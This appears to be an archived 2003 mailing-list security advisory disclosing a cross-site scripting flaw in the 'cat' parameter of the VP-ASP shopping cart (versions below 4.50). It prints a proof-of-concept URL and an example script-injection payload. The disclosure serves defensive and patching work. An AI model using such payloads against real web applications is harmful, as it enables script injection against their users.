|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Cross Site Scripting in VP-ASP
From: Xnuxer Research Laboratory (xnuxer
linux.net)
Date: Fri Dec 05 2003 - 06:19:28 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Advisory Name: Cross Site Scripting in VP-ASP
Release Date: December 05st, 2003
Application: VP-ASP
Version Affected: < 4.50
Platform: ASP
Severity: Low
Discover: Xnuxer Research Lab. (xnuxerlinux.net, xnuxeryahoo.com)
Vendor URL: http://www.vp-asp.com
Reference: http://infosekuriti.com
Proof Of Concept:
http://target.com/shopping/shopdisplayproducts.asp?id=1&cat=[XSS Code]
Exploit Example:
http://target.com/shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>
_____________________________________________________________
Linux.Net -->Open Source to everyone
Powered by Linare Corporation
http://www.linare.com/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]